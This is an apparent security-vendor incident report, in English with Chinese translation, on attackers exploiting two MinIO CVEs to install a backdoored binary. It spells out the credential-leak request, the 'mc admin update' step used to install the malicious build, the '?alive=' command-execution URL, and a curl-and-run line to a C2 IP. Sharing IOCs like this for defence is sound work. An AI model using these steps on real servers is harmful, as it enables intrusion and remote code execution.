New Attack Vector In The Cloud: Attackers caught exploiting Object Storage Services

Security Joes Incident Response team recently became aware of a set of relatively new CVEs that were released at the end of March 2023. Surprisingly, these vulnerabilities have received little to no media coverage regarding their ease of exploitation and the potential security implications they pose to any cluster running a non-native object storage.
安全 Joes 事件响应团队最近意识到一组相对较新的 CVE，这些 CVE 于 2023 年 3 月底发布。令人惊讶的是，这些漏洞几乎没有媒体报道其易于利用以及它们对运行非本机对象存储的任何集群构成的潜在安全隐患。

Object Storage is a data storage architecture for storing unstructured data, which sections data into units—objects—and stores them in a structurally flat data environment. Modern organizations create and analyze large volumes of unstructured data such as photos, videos, email, web pages, sensor data, and audio files. The major players providing such services are: AWS, Google Cloud, and Microsoft Azure. They use Object Storage as their primary storage such as AWS S3, Google Cloud Storage and Azure Blob Storage. However leading the market, other solutions exist and they are being highly in use.
对象存储是一种用于存储非结构化数据的数据存储架构，它将数据划分为单元（对象），并将其存储在结构扁平的数据环境中。现代组织创建和分析大量非结构化数据，如照片、视频、电子邮件、网页、传感器数据和音频文件。 提供此类服务的主要参与者是：AWS，Google Cloud和Microsoft Azure。他们使用对象存储作为其主要存储，例如AWS S3，Google Cloud Storage和Azure Blob Storage。然而，引领市场，存在其他解决方案，并且它们正在大量使用。

Upon investigating, we found that the specific exploit chain we stumbled into was not observed in the wild before, or at least documented, making this the first instance of evidence showcasing such non-native solutions are being adopted by attackers. It was surprising to discover that these products could have such relatively easy to exploit new set of critical vulnerabilities, making it an enticing attack vector that can be found by threat actors via online search engines. Moreover, the immediate impact associated with this specific attack, compared to traditional Webshells, raises even greater concerns.
经过调查，我们发现我们偶然发现的特定漏洞利用链以前没有在野外观察到，或者至少被记录在案，这使得这是第一个证明攻击者正在采用这种非原生解决方案的证据实例。令人惊讶的是，这些产品可能具有相对容易利用的新的关键漏洞集，使其成为威胁行为者可以通过在线搜索引擎找到的诱人攻击媒介。此外，与传统的Webshell相比，与这种特定攻击相关的直接影响引起了更大的关注。

The chain of vulnerabilities observed by our team during an attack we’ve investigated presents a worrisome situation where attackers can potentially gain the ability to remotely execute code and take full control over systems running vulnerable versions of the high-performance and distributed object storage system called MinIO. This product is part of a larger set of “non-yet-existing” set of attack vectors referred to as Non-native Object Storage Services.
我们的团队在我们调查的攻击中观察到的一系列漏洞呈现出令人担忧的情况，攻击者可能会获得远程执行代码的能力，并完全控制运行名为 MinIO 的高性能分布式对象存储系统的易受攻击版本的系统。此产品是一组更大的“尚不存在”攻击媒介集的一部分，称为非本机对象存储服务。

In our effort to enhance the security landscape and provide awareness to the infosec community, in this blogpost we provide detailed information about the threat actors responsible for exploiting these vulnerabilities, including their Tactics, Techniques, and Procedures (TTPs), Indicators of Compromise (IOCs), and characteristics of the Command and Control (C2) servers used during the attacks. We strongly encourage security teams to incorporate this valuable information into their security products and attack monitoring systems, as it can aid in proactively defending against such threats.
为了增强安全环境并提高信息安全社区的意识，在此博客文章中，我们提供了有关负责利用这些漏洞的威胁参与者的详细信息，包括他们的策略、技术和程序 （TTP）、入侵指标 （IOC） 以及攻击期间使用的命令和控制 （C2） 服务器的特征。我们强烈建议安全团队将这些有价值的信息整合到其安全产品和攻击监控系统中，因为它可以帮助主动防御此类威胁。

The article in nutshell: 文章简而言之：

[1] Attackers convinced a victim DevOps engineer to update a Non-native Object Storage Service (MinIO) to a vulnerable version.
[2] Custom made automations by Security Joes MDR team prevented the execution of the commands and thereafter escalated to our IR team.
[3] Security Joes IR, along with members of our Red Team, investigated the MinIO instance and its binary and determined it is weaponized with a built-in command shell function called GetOutputDirectly()
[4] Further research of the findings led to a GitHub repository where a vulnerability researcher is describing a chain of exploits and how to use them to exploit MinIO. The user referred to it as Evil_MinIO
[5] The Evil_MinIO is utilizing CVE-2023-28434 and CVE-2023-28432
[6] A deep analysis into the C2 server and exploit chain reveals threat actor characteristics and victimology

Security Joes is a multi-layered incident response company strategically located in nine different time-zones worldwide, providing a follow-the-sun MDR & IR coverage to respond to any incident remotely. Security Joes’ clients are protected against this threat and other related to evil Non-native evil Object Storage Services.
Security Joes是一家多层事件响应公司，战略性地分布在全球九个不同的时区，提供全天候的MDR和IR覆盖范围，以远程响应任何事件。安全 Joes 的客户端受到保护，免受此威胁以及与邪恶非原生邪恶对象存储服务相关的其他威胁。

Contact us at [email protected] for more information about our services and technologies and get additional recommendations to protect yourself against this kind of attack vector.
请通过 [email protected] 与我们联系，以获取有关我们的服务和技术的更多信息，并获得其他建议，以保护自己免受此类攻击媒介的侵害。

Short-term Costs To Long-term Risks
短期成本与长期风险

In the present landscape, terms like DevOps and DevSecOps have gained substantial traction within the technology community. These concepts furnish comprehensive frameworks that not only amplify the efficiency of development teams across the software lifecycle but also accentuate the paramount importance of security.
在目前的情况下，DevOps和DevSecOps等术语在技术社区中获得了巨大的吸引力。这些概念提供了全面的框架，不仅提高了开发团队在整个软件生命周期中的效率，而且还强调了安全性的至关重要性。

DevOps, a fusion of “Development” and “Operations,” encapsulates both a cultural shift and a technical evolution. It fosters synergistic collaboration between software developers and IT operations, with the overarching aim of streamlining the software development pipeline, expediting release cycles, and fortifying overall reliability. This objective materializes through practices like continuous integration, continuous delivery, and the pervasive adoption of infrastructure-as-code principles.
DevOps是“开发”和“运营”的融合，既体现了文化转变，也体现了技术演变。它促进了软件开发人员和IT运营之间的协同协作，其总体目标是简化软件开发管道，加快发布周期并增强整体可靠性。此目标通过持续集成、持续交付和普遍采用基础结构即代码原则等实践来实现。

In the context of software development, the decision-making landscape is riddled with variables that can substantially influence the final product. As a result, analyzing these choices assumes paramount importance. It’s evident that companies relying on software for their operations often prioritize expediency in accomplishing tasks, irrespective of the methods employed or the associated risks. Monetary considerations and time constraints typically steer the course of software development. In many cases, this dynamic can lead to the acceptance of long-term risks as an attempt to mitigate short-term costs.
在软件开发的背景下，决策环境充满了可以对最终产品产生重大影响的变量。因此，分析这些选择至关重要。很明显，依赖软件进行操作的公司通常会优先考虑完成任务的权宜之计，而不管采用的方法或相关风险如何。金钱考虑和时间限制通常会引导软件开发的过程。在许多情况下，这种动态可能导致接受长期风险，以试图减轻短期成本。

Failing to explicitly recognize the paramount importance of security across the entirety of the software development lifecycle constitutes a critical oversight. Such negligence can potentially expose an organization to substantial risks. While these risks might not be immediate, they lurk in the shadows, awaiting the right opportunity for exploitation.
未能明确认识到安全性在整个软件开发生命周期中的极端重要性构成了一个关键的疏忽。这种疏忽可能会使组织面临重大风险。虽然这些风险可能不是立竿见影的，但它们潜伏在阴影中，等待合适的利用机会。

By highlighting how attackers exploit such vulnerabilities, this blogpost underscores the vital importance of aligning Managed Detection and Response (MDR) with DevOps to ensure the ongoing resilience of an organization’s infrastructure.
通过重点介绍攻击者如何利用此类漏洞，这篇博文强调了将托管检测和响应 （MDR） 与 DevOps 保持一致以确保组织基础架构的持续弹性的至关重要性。

“What makes this incident particularly interesting is the use of a set of CVEs that were only minimally and subtly disclosed, despite their substantial impact.”, said Security Joes Threat Research Lead, Felipe Duarte.
“使这一事件特别有趣的是使用一组CVE，尽管它们产生了重大影响，但这些CVE只是最低限度和微妙地披露，”安全乔威胁研究负责人Felipe Duarte说。

The cost savings associated with employing MinIO, an open-source and high-performance object storage server, might be perceived as advantageous during the software development cycle. However, a lack of DevOps education and involvement in the importance of security created an avenue for attackers to gain unauthorized access. Notably, the exploitation of this open-source Object Storage Solution follows a distinct pattern that merits scrutiny and awareness.
在软件开发周期中，与使用开源和高性能对象存储服务器 MinIO 相关的成本节约可能被认为是有利的。然而，由于缺乏DevOps教育和对安全性重要性的参与，攻击者获得了未经授权的访问。值得注意的是，这种开源对象存储解决方案的开发遵循一种独特的模式，值得仔细审查和意识到。

“It’s important to clarify that our intention is not to imply that open-source solutions (or even non-native) are inherently less trustworthy or inferior compared to equivalent solutions. Rather, the emphasis lies in understanding and managing the associated risks. The low cost of open-source solutions is often counterbalanced by potential security implications, which makes even more relevant to follow clear and strong DevSecOps principles in your development pipeline.”, said CEO and seasoned researcher, Ido Naor.
“重要的是要澄清，我们的意图并不是暗示开源解决方案（甚至非原生解决方案）与同等解决方案相比本质上不那么值得信赖或较差。相反，重点在于理解和管理相关风险。开源解决方案的低成本通常会被潜在的安全隐患所抵消，这使得在您的开发管道中遵循清晰而强大的 DevSecOps 原则变得更加重要。

This referred-to incident holds exceptional significance and calls for a comprehensive exploration. To provide a tangible illustration, let’s delve into the particulars of the incident that came under our team’s scrutiny. This incident centers on the exploitation of MinIO, an Object Storage Solution, resulting in unauthorized access to the cluster and the subsequent execution of unauthorized code.
这一事件意义非凡，需要全面探索。为了提供一个切实的例子，让我们深入研究我们团队审查的事件的细节。此事件的核心是利用对象存储解决方案 MinIO，导致对集群的未授权访问以及随后执行未经授权的代码。

MinIO and Its Evil Twin
MinIO及其邪恶的双胞胎

As previously mentioned, MinIO is an open-source, high-performance Object Storage Service meticulously crafted to align seamlessly with the Amazon S3 API. Its versatility makes it a favored choice for serving as a cost-effective storage solution across various domains, including cloud-native applications, data lakes, and backup/archiving systems. This adaptability is complemented by its accessibility through both its RESTful API and the AWS Command Line Interface (CLI), granting users the ability to interact programmatically with the storage system.
如前所述，MinIO 是一种开源的高性能对象存储服务，经过精心设计，可与 Amazon S3 API 无缝衔接。它的多功能性使其成为跨各个领域（包括云原生应用程序、数据湖和备份/归档系统）的经济高效的存储解决方案的首选。这种适应性通过其 RESTful API 和 AWS 命令行界面 （CLI） 的可访问性得到了补充，使用户能够以编程方式与存储系统进行交互。

Upon launching the MinIO application, it unveils a RESTful API and a user interface, providing administrators with an array of controls for monitoring and operational management. These encompass the complete spectrum of capabilities required to effectively administer the application and its associated resources.
启动 MinIO 应用程序后，它推出了 RESTful API 和用户界面，为管理员提供了一系列用于监控和操作管理的控件。其中包括有效管理应用程序及其相关资源所需的全部功能。

However, during the course of the investigation, a notable discovery was made by our team. Contrary to its intended purpose as an object storage server, the MinIO application was observed executing a series of Bash commands and making attempts to download Python scripts from external online sources. This anomalous behaviour immediately sparked suspicion, hinting at a potential exploitation of the web server component, which could potentially pave the way for the execution of unauthorized code on the host.
然而，在调查过程中，我们的团队发现了一个值得注意的发现。 与其作为对象存储服务器的预期目的相反，观察到 MinIO 应用程序执行一系列 Bash 命令并尝试从外部在线资源下载 Python 脚本。这种异常行为立即引发了怀疑，暗示了对 Web 服务器组件的潜在利用，这可能会为在主机上执行未经授权的代码铺平道路。

Built using the Go programming language and compiled specifically for Linux systems, MinIO finds its usual installation directory at “/usr/local/bin/minio”. Upon execution, it operates as an independent and self-contained application that exposes a RESTful API and a user interface directly on the host. As illustrated in the figure below.
MinIO使用Go编程语言构建并专门为Linux系统编译，可以在“/usr/local/bin/minio”中找到其常用的安装目录。执行后，它作为一个独立的自包含应用程序运行，直接在主机上公开 RESTful API 和用户界面。如下图所示。

While the application found during the incident appeared to be a standard MinIO executable to the user, a deeper analysis of its code revealed the presence of malicious logic that has been added to it. Particularly, the extra code in this specific binary, exposes an endpoint that receives and executes commands via HTTP requests.
虽然在事件中发现的应用程序似乎是用户的标准MinIO可执行文件，但对其代码的更深入分析揭示了已添加到其中的恶意逻辑的存在。特别是，此特定二进制文件中的额外代码公开了一个通过 HTTP 请求接收和执行命令的终结点。

This endpoint functions as a built-in backdoor, granting unauthorized individuals the ability to execute commands on the host running the application. Notably, the executed commands inherit the system permissions of the user who initiated the application. In this instance, due to inadequate security practices, the DevOps engineer launching the application held root-level permissions.
此端点充当内置后门，使未经授权的个人能够在运行应用程序的主机上执行命令。值得注意的是，执行的命令继承了启动应用程序的用户的系统权限。在这种情况下，由于安全措施不足，启动应用程序的 DevOps 工程师拥有根级权限。

Looking for external references of this behavior, we discovered that this exact code is available on GitHub under a repository named evil_minio.
寻找此行为的外部引用，我们发现此确切代码在 GitHub 上名为 evil_minio 的存储库下可用。

According to the repository’s maintainer, this modified version of the original source code does not impact the normal functions of the tool. Instead, it provides a global backdoor that can be accessed by appending the URL parameter “alive” to the MinIO application’s URL. For example:
根据存储库的维护者的说法，原始源代码的修改版本不会影响该工具的正常功能。相反，它提供了一个全局后门，可以通过将 URL 参数“alive”附加到 MinIO 应用程序的 URL 来访问该后门。例如：

http://vulnerable.minio.server/?alive=[CMD_TO_EXECUTE]
http://vulnerable.minio.server/anything?alive=[CMD_TO_EXECUTE]

Based on the analysis we’ve conducted, the threat actor in this case was not required to utilize special frameworks to execute the attack. Instead, the very detailed GitHub repository “evil_minio”, describes about and provides a backdoored version of MinIO, ready to be a replacement for the legitimate one. The description of the attack is detailed in a step-by-step PDF written by the author of the Git repo, allowing anyone to inspect the inner working of the exploitation chain and follow it as a guide for taking over a vulnerable MinIO instance.
根据我们进行的分析，在这种情况下，威胁参与者不需要利用特殊框架来执行攻击。相反，非常详细的GitHub存储库“evil_minio”描述并提供了MinIO的后门版本，准备成为合法版本的替代品。攻击的描述在 Git 存储库作者编写的分步 PDF 中详细说明，允许任何人检查利用链的内部工作，并将其作为接管易受攻击的 MinIO 实例的指南。

To be specific, this GitHub repository contains a modified version of the MinIO source code. It’s called “evil” because it has been altered to include a backdoor that allows for unauthorized remote code execution (RCE). The actual mechanism used by the attacker to replace the original MinIO executable with this “evil” version is achieved by exploiting two vulnerabilities, CVE-2023-28434 and CVE-2023-28432. These vulnerabilities impact all MinIO versions that precede RELEASE.2023-03-20T20-16-18Z.
具体来说，这个GitHub存储库包含MinIO源代码的修改版本。它之所以被称为“邪恶”，是因为它已被修改为包含允许未经授权的远程代码执行 （RCE） 的后门。攻击者用于将原始 MinIO 可执行文件替换为此“邪恶”版本的实际机制是通过利用两个漏洞 CVE-2023-28434 和 CVE-2023-28432 来实现的。这些漏洞会影响 RELEASE.2023-03-20T20-16-18Z 之前的所有 MinIO 版本。

Here’s a breakdown of the changes made to the original MinIO code to create this “evil” twin:
以下是对原始 MinIO 代码所做的更改的细分，以创建这个“邪恶”的双胞胎：

1. Addition of cmd/x.go: This file contains a function getOutputDirectly(cmdStr string) that executes system commands. This is the core of the backdoor, as it allows arbitrary command execution.
   添加cmd/x.go：此文件包含一个执行系统命令的函数getOutputDirect（cmdStr字符串）。这是后门的核心，因为它允许任意命令执行。

2. Modification of cmd/routers.go: A line has been added to this file to include xHandler in the list of handlers. This means that the xHandler function will be called for certain HTTP requests.
   修改cmd/routers.go：此文件中添加了一行，将xHandler包含在处理程序列表中。这意味着将为某些 HTTP 请求调用 xHandler 函数。

3. Modification of cmd/generic-handlers.go: The xHandler function has been added to this file. This function checks for the presence of a query parameter named “alive” in the HTTP request. If this parameter is present, its value is passed to the getOutputDirectly function, allowing the execution of arbitrary commands.
   修改 cmd/generic-handlers.go：xHandler 函数已添加到此文件中。此函数检查 HTTP 请求中是否存在名为“活动”的查询参数。如果此参数存在，则其值将传递给 getOutputDirect 函数，从而允许执行任意命令。

In our malware analysis lab, we conducted several tests and analysis on the MinIO executable extracted from the infected host. As a result, we were able to replicate the backdoor functionality described earlier. In the example shown in Figure 4, the command ifconfig was passed through the parameter alive, and the response containing the result of the command execution was returned. This demonstrates the ability of unauthorized users to execute arbitrary commands on the compromised host through the backdoor functionality present in the modified MinIO application.
在我们的恶意软件分析实验室中，我们对从受感染主机中提取的 MinIO 可执行文件进行了多次测试和分析。因此，我们能够复制前面描述的后门功能。在图 4 所示的示例中，命令 ifconfig 通过 live 参数传递，并返回包含命令执行结果的响应。这演示了未经授权的用户通过修改后的 MinIO 应用程序中存在的后门功能在受感染主机上执行任意命令的能力。

It is worth mention that we have no reasons to believe that the author is the one behind the attack nor we have any links between the author and the attackers. We can say that the repo “evil_minio” was created during the time of the exploits being released, meaning that both the exploits and PoC guide are fairly new.
值得一提的是，我们没有理由相信作者是攻击的幕后黑手，也没有理由相信作者和攻击者之间没有任何联系。我们可以说存储库“evil_minio”是在漏洞发布期间创建的，这意味着漏洞利用和PoC指南都是相当新的。

Exploit Chain 漏洞利用链

As indicated in the preceding section, the “evil” version of MinIO is introduced onto the targeted systems through the exploitation of two distinct vulnerabilities: CVE-2023-28434 and CVE-2023-28432.
如上一节所述，MinIO 的“邪恶”版本通过利用两个不同的漏洞引入目标系统：CVE-2023-28434 和 CVE-2023-28432。

As stated earlier in the blog, these vulnerabilities impact all MinIO versions that precede RELEASE.2023-03-20T20-16-18Z. They possess the potential to expose sensitive information present within the compromised installation and facilitate Remote Code Execution (RCE) on the host where the MinIO application is operational.
如博客前面所述，这些漏洞会影响 RELEASE.2023-03-20T20-16-18Z 之前的所有 MinIO 版本。它们有可能暴露受感染安装中存在的敏感信息，并促进 MinIO 应用程序运行的主机上的远程代码执行 （RCE）。

The exploitation process begins with a crafted request targeting the endpoint “/minio/bootstrap/v1/verify”, which allows the attacker to obtain the values of the environment variables used by the application, see Figure 5. This becomes particularly significant because MinIO relies on environment variables to configure the administrator credentials, escalating the severity of the vulnerability. In other words, with a single request, an attacker can retrieve the admin credentials of a vulnerable instance.
利用过程从针对端点“/minio/bootstrap/v1/verify”的构建请求开始，该请求允许攻击者获取应用程序使用的环境变量的值，请参见图 5。这一点变得尤为重要，因为 MinIO 依赖于环境变量来配置管理员凭据，从而升级了漏洞的严重性。换句话说，通过单个请求，攻击者可以检索易受攻击的实例的管理员凭据。

Upon successfully uncovering the admin credentials, the malicious actor gains the ability to establish a connection and engage with the compromised instance through the MinIO Client. This tool, accessible for download from the official website, serves as the conduit for interaction. With a foothold within the compromised instance, the attacker proceeds to exploit the admin update command. This particular command empowers the attacker to designate an alternative URL for updates, veering away from the official site.
成功发现管理员凭据后，恶意行为者将能够通过 MinIO 客户端建立连接并与受感染的实例互动。该工具可从官方网站下载，作为交互的渠道。攻击者在受感染实例中立足，继续利用管理员更新命令。此特定命令使攻击者能够指定更新的替代 URL，从而远离官方网站。

In standard circumstances, this command functions as a legitimate and streamlined approach for upgrading a MinIO installation. However, the attacker capitalizes on this utility by specifying an alternative MIRROR_URL for the update. By doing so, the attacker can effectively replace the authentic binary with its malicious counterpart, hosted on a remote server under the attacker’s control.
在标准情况下，此命令可作为升级 MinIO 安装的合法且简化的方法。但是，攻击者通过指定更新的备用MIRROR_URL来利用此实用程序。通过这样做，攻击者可以有效地将真实的二进制文件替换为其恶意对应项，该二进制文件托管在攻击者控制的远程服务器上。

The culmination of these actions permits the attacker to orchestrate a deceptive update. By replacing the authentic MinIO binary with its “evil” counterpart, the attacker seals the compromise of the system. This strategic maneuver leverages the inherent trust within the update process to introduce the compromised binary.
这些操作的高潮允许攻击者策划欺骗性更新。通过将真实的 MinIO 二进制文件替换为其“邪恶”对应项，攻击者密封了系统的危害。此策略利用更新过程中的固有信任来引入受损的二进制文件。

All the steps required to achieve code execution in a vulnerable MinIO instance are described below:
在易受攻击的 MinIO 实例中实现代码执行所需的所有步骤如下所述：

1. POST request to endpoint /minio/bootstrap/v1/verify to expose the credentials of the admin account.
1. 向端点 /minio/bootstrap/v1/verify 发出 POST 请求以公开管理员帐户的凭据。

2. Attacker configures a MinIO client to interact with the vulnerable instance using the credentials gotten in Step 1. For this, the following command lines are required:
2. 攻击者将 MinIO 客户端配置为使用步骤 1 中获取的凭据与易受攻击的实例进行交互。为此，需要以下命令行：

mc alias set [ALIAS] [URL_TARGET_MINIO] [ACCESS_KEY] [SECRET_KEY]
mc alias list

3. Attackers trigger the update process on the compromised MinIO instance, pointing to a malicious payload hosted on a remote server. For this, the following command is executed.
3. 攻击者在受感染的 MinIO 实例上触发更新过程，指向远程服务器上托管的恶意负载。为此，执行以下命令。

mc admin update [ALIAS] [MIRROR_URL] --yes

4. “Evil” MinIO is installed, now containing a global backdoor that allows the attacker to execute commands on the host.
4. 安装了“邪恶”MinIO，现在包含一个全局后门，允许攻击者在主机上执行命令。

Not Another Webshell 不是另一个网络外壳

Webshells are malicious scripts or programs that provide unauthorized access to and control over compromised web servers. They can be written in various languages, including scripting languages like PHP, Perl, ASP, and Python, as well as programming languages such as Java and Ruby. These scripts or programs allow attackers to establish a somewhat hidden and persistent channel, enabling them to operate covertly. Acting as a command-line interface within a web environment, webshells let attackers execute arbitrary commands and perform a wide range of actions on the compromised server.
Webshell 是恶意脚本或程序，提供对受感染 Web 服务器的未经授权的访问和控制。它们可以用各种语言编写，包括PHP，Perl，ASP和Python等脚本语言，以及Java和Ruby等编程语言。这些脚本或程序允许攻击者建立一个隐藏且持久的通道，使他们能够秘密操作。作为 Web 环境中的命令行界面，Webshell 允许攻击者在受感染的服务器上执行任意命令并执行各种操作。

These scripts vary significantly in complexity, ranging from tiny command interpreters that receive the malicious payload as a string via HTTP requests and execute its code using functions like “eval” (e.g., China Chopper Webshell) to sophisticated software with advanced functionalities, including fancy graphical user interfaces (GUI) like the example provided below.
这些脚本的复杂性差异很大，从通过HTTP请求以字符串形式接收恶意负载并使用“eval”（例如China Chopper Webshell）等函数执行其代码的微小命令解释器到具有高级功能的复杂软件，包括花哨的图形用户界面（GUI），如下例所示。

However, the operation of the backdoor in the context of MinIO exploitation diverges significantly from this conventional pattern. Typically, when a backdoor infiltrates a web server, it often leaves behind telltale signs – suspicious files lurking within the server’s file system. These additional files are often introduced through the exploitation of vulnerabilities within the website. Subsequently, the software responsible for executing the web server’s code loads and interprets these files, effectively initiating the execution of malicious code. The presence of these files on the disk serves as a red flag for site administrators and defenders, acting as an indicator of potential exploitation of the site.
但是，在 MinIO 开发环境中，后门的操作与这种传统模式有很大不同。通常，当后门渗透到 Web 服务器时，它通常会留下明显的迹象——潜伏在服务器文件系统中的可疑文件。这些附加文件通常是通过利用网站内的漏洞引入的。随后，负责执行Web服务器代码的软件加载并解释这些文件，从而有效地启动恶意代码的执行。磁盘上存在这些文件是站点管理员和防御者的危险信号，是站点潜在利用的指标。

In the MinIO scenario, the dynamics play out differently. No traces of these conventional suspicious scripts are strewn across the disk. However, beneath the surface, an embedded backdoor lies in wait. Identifying this backdoor mandates vigilant scrutiny of the web server’s behavior and a comprehensive endeavor in reverse engineering the application.
在 MinIO 场景中，动态效果不同。磁盘上没有这些常规可疑脚本的痕迹。然而，在表面之下，一个嵌入式后门正在等待。识别此后门要求对 Web 服务器的行为进行警惕的审查，并对应用程序进行逆向工程的全面努力。

The intricate nature of this threat renders traditional signature-based detectors inadequate in capturing its presence, as demonstrated in Figure 7. Remarkably, even a month after its initial report, the file continues to exhibit zero detections through traditional signature-based detection mechanisms.
这种威胁的复杂性使得传统的基于特征码的检测器无法捕获其存在，如图 7 所示。值得注意的是，即使在初次报告一个月后，该文件仍然通过传统的基于签名的检测机制表现出零检测。

Threat Actor Arsenal 威胁演员阿森纳

The Threat Actor involved in the active exploitation of this particular set of vulnerabilities possesses a unique profile. Our investigation has revealed that this actor demonstrates a significant degree of experience and expertise in working with bash scripts and the Python programming language. These expertise extends to both client and server-side applications.
参与主动利用这组特定漏洞的威胁参与者拥有独特的配置文件。我们的调查显示，该演员在使用bash脚本和Python编程语言方面表现出相当程度的经验和专业知识。 这些专业知识扩展到客户端和服务器端应用程序。

In the subsequent sections, we will provide an in-depth exploration of the tools and network infrastructure employed by this Threat Actor. This detailed exploration aims to equip the reader with a comprehensive understanding of the actor’s tactics, allowing for informed insights into detection and mitigation strategies.
在后续部分中，我们将深入探讨此威胁参与者使用的工具和网络基础结构。这种详细的探索旨在使读者全面了解参与者的策略，从而对检测和缓解策略提供明智的见解。

Downloader Scripts 下载器脚本

Upon successfully compromising the MinIO installation and securing remote code execution via the embedded backdoor within the “Evil” MinIO binary, the attacker proceeds with post-compromise activities. This phase commences with the download of the primary payload. An illustrative command employed during this stage for Linux systems is presented below:
成功破坏 MinIO 安装并通过“邪恶”MinIO 二进制文件中的嵌入式后门保护远程代码执行后，攻击者继续进行入侵后活动。此阶段从下载主有效负载开始。下面介绍了在此阶段用于 Linux 系统的说明性命令：

curl 5.183.95.88/host/[HOST_ID] -o /tmp/h
sh /tmp/h &

These commands download and executed the initial Downloader script in the compromised machine. Depending on the operating system, this script could be either a bash or batch script. Regardless of the operating system, the Downloader script’s functionality remains consistent. It initiates a connection with the C2 server and recurrently fetches, executes supplementary scripts and post the results to the malicious server, see Figure 8 and Figure 9. This code operates in an iterative manner, serving as a gateway for introducing additional payloads onto the compromised hosts.
这些命令在受感染的计算机中下载并执行初始下载程序脚本。根据操作系统的不同，此脚本可以是 bash 脚本或批处理脚本。无论操作系统如何，下载程序脚本的功能都保持一致。它启动与 C2 服务器的连接，并反复获取、执行补充脚本并将结果发布到恶意服务器，请参见图 8 和图 9。此代码以迭代方式运行，充当将其他有效负载引入受感染主机的网关。

Notably, the code in this stage is not obfuscated, making it relatively easy to understand and analyze.
值得注意的是，此阶段的代码没有混淆，因此相对容易理解和分析。

In the context of Linux systems, this malicious script relies on the standard utilities curl and wget to download the additional content, selecting the one that is available on the compromised host. On the other hand, for Windows systems, the script makes use of an open-source downloading tool called winhttpjs.bat. In instances where this tool is not available, the script resorts to utilizing the Windows utility bitsadmin. This adaptive approach ensures that the script can effectively operate across both Linux and Windows environments, leveraging available tools to fulfill its downloading requirements.
在 Linux 系统的上下文中，此恶意脚本依赖于标准实用程序 curl 和 wget 来下载其他内容，选择受感染主机上可用的内容。另一方面，对于Windows系统，该脚本使用名为winhttpjs.bat的开源下载工具。在此工具不可用的情况下，脚本将利用 Windows 实用程序 bitsadmin。这种自适应方法可确保脚本可以在 Linux 和 Windows 环境中有效运行，利用可用工具满足其下载要求。

An important aspect to highlight is that all the scripts downloaded by this tool are uniquely identified by a parameter referred to as SCRIPT_ID. The outcome of these scripts plays a crucial role in the decision-making process of the threat actor’s backend.
需要强调的一个重要方面是，此工具下载的所有脚本都由称为 SCRIPT_ID 的参数唯一标识。这些脚本的结果在威胁参与者后端的决策过程中起着至关重要的作用。

Depending on the results obtained from these scripts, the backend determines the value of the compromised machine. Subsequently, the backend determines whether to proceed by deploying additional scripts or to halt execution altogether. This dynamic approach underscores the threat actor’s strategic approach in optimizing their efforts based on the perceived value of the compromised system.
根据从这些脚本获得的结果，后端确定受感染计算机的值。随后，后端确定是通过部署其他脚本继续还是完全停止执行。这种动态方法强调了威胁参与者根据受感染系统的感知价值优化其工作的战略方法。

System Profiling Script 系统分析脚本

Considerable effort is invested by the threat actor in systematically collecting information from the compromised system and its immediate environment. Following this footprint, the initial action taken by the threat actor post-compromise involves gathering comprehensive data from the host. This data encompasses a wide range of information, including user details, available memory, installed cronjobs, disk usage, and more, see Figure 10.
威胁参与者投入了大量精力来系统地从受感染的系统及其直接环境中收集信息。在此足迹之后，威胁参与者在入侵后采取的初始操作涉及从主机收集全面的数据。此数据包含广泛的信息，包括用户详细信息、可用内存、已安装的 cronjob、磁盘使用情况等，请参见图 10。

Subsequently, this data is transmitted to the Command and Control (C2) infrastructure, where the compromised system undergoes registration and validation. This validation process serves as a trigger, prompting the deployment and execution of additional scripts on the compromised machine. The orchestrated sequence ensures that the threat actor has a clear understanding of the compromised system’s attributes and status.
随后，这些数据被传输到命令和控制（C2）基础设施，在那里对受感染的系统进行注册和验证。此验证过程充当触发器，提示在受感染的计算机上部署和执行其他脚本。编排的序列可确保威胁参与者清楚地了解受感染系统的属性和状态。

Network Reconnaissance Script
网络侦测脚本

Subsequent to acquiring the victim’s system profile, the threat actor initiates the deployment of a new script. This script conducts network reconnaissance activities, aimed at identifying accessible interfaces, hosts and ports. The scanning process involves the utilization of either portable scanning tools or Python-based scripts, as depicted in Figure 11.
在获取受害者的系统配置文件后，威胁参与者会启动新脚本的部署。此脚本执行网络侦测活动，旨在识别可访问的接口、主机和端口。扫描过程涉及使用便携式扫描工具或基于 Python 的脚本，如图 11 所示。

The logic of this network scanner is straightforward. First, the script checks if a compatible Python interpreter is present on the compromised host. If a compatible version of Python is found, it proceeds to download a Python script named scan.py and executes the scanning logic from there.
此网络扫描程序的逻辑很简单。首先，该脚本检查受感染的主机上是否存在兼容的 Python 解释器。如果找到兼容的 Python 版本，它将继续下载名为 scan.py 的 Python 脚本，并从那里执行扫描逻辑。

If no compatible Python interpreter is detected on the system, the script downloads a standalone Linux binary called scan_linux. This binary is a compiled executable of the Python script that includes all the necessary libraries to run the scanning logic.
如果在系统上未检测到兼容的 Python 解释器，则脚本将下载一个名为 scan_linux 的独立 Linux 二进制文件。此二进制文件是 Python 脚本的编译可执行文件，其中包含运行扫描逻辑所需的所有库。

In addition to the network scanning capabilities, it also extracts network interfaces from the compromised machine. The script follows a similar logic to the network scanning process. If a compatible Python interpreter is present on the compromised host, the script downloads and executes a Python script named networks.py to extract the network interfaces.
除了网络扫描功能外，它还从受感染的计算机中提取网络接口。该脚本遵循与网络扫描过程类似的逻辑。如果受感染的主机上存在兼容的 Python 解释器，则该脚本将下载并执行名为 networks.py 的 Python 脚本以提取网络接口。

In cases where no compatible Python interpreter is available, the script downloads a standalone Python compiled binary named networks_linux specifically designed for Linux systems. This approach allows the attacker to gather information about the network interfaces present on the compromised machine in different environments without the need for a preconfigured Python environment.
如果没有兼容的 Python 解释器可用，脚本会下载一个名为 networks_linux 专为 Linux 系统设计的独立 Python 编译二进制文件。此方法允许攻击者收集有关不同环境中受感染计算机上存在的网络接口的信息，而无需预配置的 Python 环境。

Notably, this network reconnaissance script contains a hardcoded commend in Russian language that says “# не на linux маска в hex формате”, which means “not on linux mask in hex format”. This comment can shed some light about the origin of the threat actor.
值得注意的是，这个网络侦察脚本包含一个俄语硬编码的推荐，上面写着“# не на linux маска в hex формате”，意思是“不在十六进制格式的 Linux 掩码上”。此评论可以阐明威胁参与者的来源。

Extra Tools 额外工具

In addition to the toolkit previously outlined, our analysis of the network infrastructure unveiled a series of supplementary files, each meticulously designed to fulfill distinct roles within the intrusion process. The subsequent section offers an exhaustive examination of these tools, providing comprehensive insights into their individual functionalities and roles within the broader intrusion strategy.
